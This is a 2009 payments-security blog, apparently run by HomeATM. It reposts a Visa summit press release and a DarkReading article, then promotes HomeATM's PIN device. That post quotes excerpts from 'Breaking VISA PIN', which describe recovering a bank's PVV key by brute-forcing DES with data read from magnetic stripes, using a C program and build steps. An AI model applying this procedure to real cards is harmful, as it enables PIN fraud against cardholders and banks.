Monday, March 23, 2009

More Investment Needed to Secure Credit Cards

Media Center | Visa Corporate

Visa Calls for Maintaining Investment, Shared Responsibility at Global Security Summit

New Survey Shows Consumers Avoiding Retailers Who May Not Protect Data

VisaInc. (NYSE: V) chief enterprise risk officer Ellen Richey told securityexperts today that payment card data fraud rates remain near historiclows despite economic woes and high-profile compromises, and called forcontinued industry investment, collaboration and innovation, three keycomponents in keeping the electronic payment system secure in thefuture. She made her comments to a gathering of business, government,academic and law enforcement officials at Visa's Global SecuritySummit, its' third cross-functional symposium on payment security, heldin Washington, DC.

"Massiveinvestments and innovative solutions have kept fraud rates near anall-time low," said Richey. "The best way to build on this track recordis by having all players in the payment system share responsibility andmaintain their investments in security - even during these times ofeconomic challenge."

Richeyalso addressed recent security compromises by reminding the audiencethat compliance with the Payment Card Industry Data Security Standard(PCI DSS) continues to be the industry's best tool to guard againsttheft of cardholder data and the best protection for businesses againstunwanted intrusions. She also added that PCI DSS validation is anannual, minimum requirement for organizations but that true compliancewith PCI DSS is an ongoing effort requiring vigilance.

Read the Security Summit keynote address given by Ellen Richey, Visa's chief enterprise risk officer.
Watch a webcast of the Security Summit

"PCIDSS remains an effective security tool when implemented properly - andremains the best defense against the loss of sensitive data. Nocompromised entity to date has been found to be in compliance with PCIDSS at the time of the breach," she said.  (Editor's Note:  Thus the importance of HomeATM achieving PCI 2.0 PED Certification...)

Reinforcingthe need for vigilance on security at the merchant level, Visa releaseda new survey showing that many consumers are choosing to shop only withretailers they trust to protect their personal data. Of the 800 and debit cardholders surveyed February 3-5, 2009, 59% said theyhad decided not to make an online purchase at a particular web sitebecause they did not trust that site. Another 49% said they had optednot to shop with a merchant they did not recognize, for fear of havingtheir personal data stolen.

EchoingRichey's themes of shared responsibility and cooperation was summitkeynote speaker Dave DeWalt, president and CEO of McAfee Inc., whocalled for better cross-border collaboration and for businesses to makesecurity a priority through risk assessments, closing gaps, and beingvigilant. 

"Nowmore than ever, security is mission critical to all organizations,"said DeWalt. "Compliance with mandates such as PCI DSS should notsimply be a checklist item; instead organizations should always bevigilant and continuously assess their risks and exposure and implementstrong security controls." 
MassachusettsAttorney General Martha Coakley also provided a key note address at theevent and said that increased collaboration between government and theprivate sector is imperative to protect consumer data. She called onindustry to make data security a commitment on par with protectingintellectual property and trade secrets.

"Privacyprotection, safety and security is an ever-changing landscape asgovernment, law enforcement, industry, and consumers seek to balancetechnological advances in society with traditional expectations ofprivacy and security," said Coakley. "Creating and implementingstrategies and solutions to combat these problems will requirethoughtful planning and commitment from decision makers in both theprivate and public sectors."

Richey conveyed four priorities she sees as critical for the future security of the payment industry, including:
  • Accelerate global data breach preparedness with greater PCI DSS compliance
  • Actively engage consumers in the process of protecting their data
  • Increase collaboration across the payment system to close security gaps and share critical information more quickly
  • Reduce the value of stolen data through investment in new authentication measures

Driving homethe importance of empowering consumers to take a more active role inprotecting their card accounts, Richey highlighted a Visa service toprovide near real-time alerts and notifications when a registered Visacard is used for a purchase or cash withdrawal. In addition toproviding cardholders a tool to track and manage their accounts,transaction alerts can also help limit the extent of potential fraud.If a cardholder receives a suspicious alert, they can immediately calltheir issuer. 

"Visa'searly-warning system can provide peace of mind and help protectconsumers from card fraud at the crime's initial stage," Richey said."A consumer who receives an alert would be able to make a simple phonecall to stop fraud in its tracks."

Visa'stransaction alerts and notifications service is commercially availabletoday for Chase Visa cardholders with mobile devices powered byAndroid, the Open Handset Alliance's open source platform for mobiledevices. The service will be rolled out to additional financialinstitutions and for additional mobile devices later this year.

Heldin cooperation with the Economist Intelligence Unit, Visa's GlobalSecurity Summit was convened to discuss how payments systemparticipants can collaborate to protect cardholders against current andemerging security threats. Five panels were assembled to cover topicsrelated to innovations in payment security, strengthening e-commercesecurity, small business data protection, global executives' securitypriorities, and the world of hackers. A webcast of the summit can beviewed at

About Visa
Visaoperates the world's largest retail electronic payments networkproviding processing services and payment product platforms. Thisincludes consumer credit, debit, prepaid and commercial payments, whichare offered under the Visa, Visa Electron, Interlink and PLUS brands.Visa enjoys unsurpassed acceptance around the world and Visa/PLUS isone of the world's largest global ATM networks, offering cash access inlocal currency in more than 170 countries. For more information, visit

Jay Hopkins for Visa
Tel.: +1-703-683-5004 ext. 107

Small Biz Being Targeted by Cybercriminals

Small Business: The New Black In Cybercrime Targets

Enticed by poor defenses of mom-and-pop shops, hackers turn away from hardened defenses of banks and large enterprises

By Tim Wilson  DarkReading

WASHINGTON, D.C. -- Visa Security Summit 2009 -- Hacking banks and large businesses? That's sooo 2008.

Hackers and computer criminals this year are taking a new aim -- directly at small and midsize businesses, according to experts who spoke here today at Visa's annual security event. The consensus: Smaller businesses offer a much more attractive target than larger enterprises that have steeled themselves with years of security spending and compliance efforts.

"As the security becomes better at large companies, the small business begins to look more and more enticing to computer criminals," said Charles Matthews, president of the International Council for Small Business, in a panel presentation here. "It's the path of least resistance."

Matthews quoted industry research that states small businesses are far less prepared to defend themselves against cyberattack. "Nearly one-fifth of small businesses don't even use antivirus software," he said. "Sixty percent don't use any encryption on their wireless links. Two-thirds of small businesses don't have a security plan in place. These numbers are both surprising and disturbing."

And many small businesses still don't know they are targets, according to Chris Gray, director of innovation policy at the Canadian Chamber of Commerce and another member of the panel. "According to a brief survey we conducted, about two-thirds of small and medium-sized businesses believe that large companies are the main target for cybercrime," he reported. "Yet 85 percent of the fraud we see in business occurs in small and medium-sized businesses."

Editor's Note:  Small to Medium Internet Businesses can provide a dually authenticated, end-to-end encrypted payment solution for their e-shoppers.  For these e-SME's the cost of PCI DSS compliance is costly, time consuming and confusing.  You can solve your compliance issues and eliminate the cost by employing HomeATM's PCI 2.0 PED's.  The cost is far less than achieving PCI 2.0 compliance on your own, and since we employ DUKPT key management techniques, the cardholder's data is NEVER transmitted.  End result?  Your e-business would be effectively removed from the burden of PCI DSS' scope.  For more information, email us...

Continue the story at DarkReading

Reblog this post [with Zemanta]

Make the "Hack You" Link...

You've heard of  the F-Bomb, the H-Bomb and the F-Word.  With the recent rash of Hack's (Heartland, RBS WorldPay and more coming) there's a new one...I call it the H-Word.  It's Black Hat slang for Hack You!

Heartland knows what it feels like when a Black Hat says "Hack You!"  Suffice it to say their stock symbol might be HPY, but shareholders are not.  Why?  Again...two words.  Hack You!  So what's the safer approach to protecting your Online Debit (PIN) number?

A PCI 2.0 PED "certified" approach...or a soft(ware is the PVV?) approach?   W
hat's more readily hackable?  Hardware or Software.  It's not "hard" to make the "Hack-You"-Lynk...

Although the answer is an obvious one, never underestimate the impact of good marketing prowess.  The EFT Networks may have fallen for a good sales pitch Hook, Line and Sinker, but they should know better.  They'll know soon enough...why a software only approach to protecting a consumer's PIN is soft.   My biggest concern is a breach, not competition.  I don't want to see peoples PIN's hacked because it will affect the industry as a whole, and we are part of that industry.  The writing is SO CLEARLY on the wall.  I'd like to see it encrypted...

Since data is what's at stake here, we'll provide some.  

What follows are some excerpts from
a paper called "Breaking VISA PIN" written by Luis Padilla Visdómine.   If you're not a tekkie, you'll have to read it a little bit more slowly in order for it to properly digest.  In the meantime, here's the meat and potatoes:  A software approach WILL BE HACKED, PERIOD, END OF STORY, GUARANTEED.   Many prominent industry insiders agree.  HomeATM's CEO guarantees it will happen within 30 days of it going live.  If it takes 60 or 90 days, don't hold it against him...he's only trying to help.

There's only one way to prevent a Black Hat attack resulting in the H-Word.  You've got to fight fire with this case, with "another" H-Word...HomeATM.  (bet you thought I was going to say Hardware, didn't you?...)

HomeATM reached the summit or PINNACLE of security with it's recent PCI 2.0 certification.
(Click any picture to enlarge)  What does this mean?

It means that HomeATM's "SAFE-T-PIN" solution encrypts the entire transaction, beginning to end which should thus remove participating merchants from the scope of the PCI DSS as NO CARDHOLDER DATA is transmitted during the transaction.  What does THAT mean?

Considering the fact that PCI DSS compliance is a costly process, that fact alone should result in considerable interest.  Instead of paying tens of thousands, in some cases hundreds of thousands of dollars, an e-merchant could employ HomeATM's payment platform and be in like Flynt. 

Additionally, since the HomeATM SAFE-T-PIN
provides a "card present" environment, interchange morphs from the significantly higher "Card NOT Present" rates into a significantly lower "Card Present" rate.  But we're not done yet.  In addition to our solution removing our clients from the PCI DSS scope and lowering interchange to Card Present rates, we ALSO further reduce interchange by providing a true PIN based transaction.

PIN based transactions, because of their inherent dual-authentication processing (What you have/Card and What you Know/PIN) enjoy a reduced interchange rate on top of the CP rate.  In effect, HomeATM could save giant e-tailers tens of millions of dollars on Interchange.  "Annually!"

On the flip side, considering that a "software" approach requires the card holder to "type" their PAN (Primary Account Number) into a browser, e-tailers will still have to pay a "card not present" rate.  So even if it isn't H'd in the first 90 days, Internet Retailers would still be paying a higher rate in return for the convenience of not having good security.  But since the Internet Retailer is the one who is going to be liable when it is dot.hacked, they'll quickly learn they've been had. 

Here are the excerpts:  To read his entire paper, click here

VISA PVV algorithm

One of the most common PIN algorithms is the VISA PIN Verification Value (PVV). The customer is given a PIN and a magnetic stripe card. Encoded in the magnetic stripe is a four digit number, called PVV. This number is a cryptographic signature of the PIN and other data related to the card. When a user enters his/her PIN the ATM reads the magnetic stripe, encrypts and sends all this information to a central computer.

There a trial PVV is computed using the customer entered PIN and the card information with a cryptographic algorithm. The trial PVV is compared with the PVV stored in the card, if they match the central computer returns to the ATM authorization for the transaction. See in more detail.

Preparing the attack

A brute force attack consists in encrypting a TSP with known PVV using all possible encrypting keys and compare each obtained PVV with the known PVV. When a match is found we have a candidate key. But how many keys we have to try? As we said above the key is 64 bit long, this would mean we have to try 2^64 keys. However this is not true. Actually only 56 bits are effective in DES keys because one bit (the least significant) out of each octet was historically reserved as a checksum for the others; in practice those 8 bits (one for each of the 8 octets) are ignored.

Therefore the DES key space consists of 2^56 keys. If we try all these keys will we find one and only one match, corresponding to the bank secret key? Certainly not. We will obtain many matching keys. This is because the PVV is only a small part (one fourth) of the DES output.
Furthermore the PVV is degenerated because some of the digits (those between 0 and 5 after the last, seen from left to right, digit between 6 and 9) may come from a decimal digit or from a decimalized hexadecimal digit of the DES output. Thus many keys will produce a DES output which yields to the same matching PVV.

The attack

Once we know we need five TSP-PVV pairs, how do we get them? Of course we need at least one card with known PIN, and due to the nature of the PVV algorithm, that's the only thing we need. With other PIN systems, such as IBM, we would need five cards, however this is not necessary with VISA PVV algorithm. We just have to read the magnetic stripe and then change the PIN four times but reading the card after each change.

It is necessary to read the magnetic stripe of the card to get the PVV and the encrypting key selector. You can buy a commercial magnetic stripe reader or make one yourself following the instructions you can find in the previous page and links therein. Once you have a reader see this description of standard magnetic tracks to find out how to get the PVV from the data read. In that document the PVV field in tracks 1 and 2 is said to be five character long, but actually the true PVV consists of the last four digits. The first of the five digits is the key selector. I have only seen cards with a value of 1 in this digit, which is consistent with the standard and with the secret key never being compromised (and therefore they did not need to move to another key changing the selector).

I did a simple C program, getpvvkey.c, to perform the attack. It consists of a loop to try all possible keys to encrypt the first TSP, if the derived PVV matches the true PVV a new TSP is tried, and so on until there is a mismatch, in which case the key is discarded and a new one is tried, or the five derived PVVs match the corresponding true PVVs, in which case we can assume we got the bank secret key, however the loop goes on until it exhausts the key space. This is done to assure we find the true key because there is a chance (although very low) the first key found is a false positive.

It is expected the program would take a very long time to finish and to minimize the risks of a power cut, computer hang out, etc. it does checkpoints into the file getpvvkey.dat from time to time (the exact time depends on the speed of the computer, it's around one hour for the fastest computers now in use). For the same reason if a positive key is found it is written on the file getpvvkey.key. The program only displays one message at the beginning, the starting position taken from the checkpoint file if any, after that nothing more is displayed.

The DES algorithm is a key point in the program, it is therefore very important to optimize its speed. I tested several implementations: libdes, SSLeay, openssl, cryptlib, nss, libgcrypt, catacomb, libtomcrypt, cryptopp, ufc-crypt.

The DES functions of the first four are based on the same code by Eric Young and is the one which performed best (includes optimized C and x86 assembler code). Thus I chose libdes which was the original implementation and condensed all relevant code in the files encrypt.c (C version) and x86encrypt.s (x86 assembler version). The code is slightly modified to achieve some enhancements in a brute force attack: the initial permutation is a fixed common steep in each TSP encryption and therefore can be made just one time at the beginning. Another improvement is that I wrote a completely new setkey function (I called it nextkey) which is optimum for a brute force loop.

To get the program working you just have to type in the corresponding place five TSPs and their PVVs and then compile it. I have tested it only in UNIX platforms, using the makefile Makegetpvvkey to compile (use the command "make -f Makegetpvvkey"). It may compile on other systems but you may need to fix some things. Be sure that the definition of the type long64 corresponds to a 64 bit integer. In principle there is no dependence on the endianness of the processor. I have successfully compiled and run it on Pentium-Linux, Alpha-Tru64, Mips-Irix and Sparc-Solaris. If you do not have and do not want to install Linux (you don't know what you are missing ;-) you still have the choice to run Linux on CD and use my program, see my page running Linux without installing it.

Reblog this post [with Zemanta]

E-Tailers Missed Out on $21 Billion

$21 Billion might not cover the bonuses at AIG but it's still a mighty big number...HomeATM can help bring those numbers back up by properly  "securing" the transaction with their PCI 2.0 PED SAFE-T-PIN, the very first PCI certified PIN Entry Device designed for use on the web.   

Javelin Strategy & Research in its latest research has stated that the volume of online sales has decreased by $21 billion in 2008.

According to survey results only 45% are satisfied with the quality of the merchandise sold online and the time of shipping whereas 37% of consumers complained of late shipments and 28% of online customers found that the quality of the goods they received is below their expectations.

19% of Internet users said that they have cut their online spending and 12% of consumers stated that they stopped using online shopping services due to online fraudsters.

To motivate online shoppers the retailers use various strategies. So, according to Javelin Strategy & Research the sellers assure users in safety of their personal information (83%), (Editor's Note: how do they do that if  the information isn't properly protected in the first place?) and by guaranteeing price (79%), quality expectations (80%) and reimbursement.

Among other top promises are a zero liability against identity theft (81%) and stronger security at the store website (80%).

Source: eBillme blog

Reblog this post [with Zemanta]

Disqus for ePayment News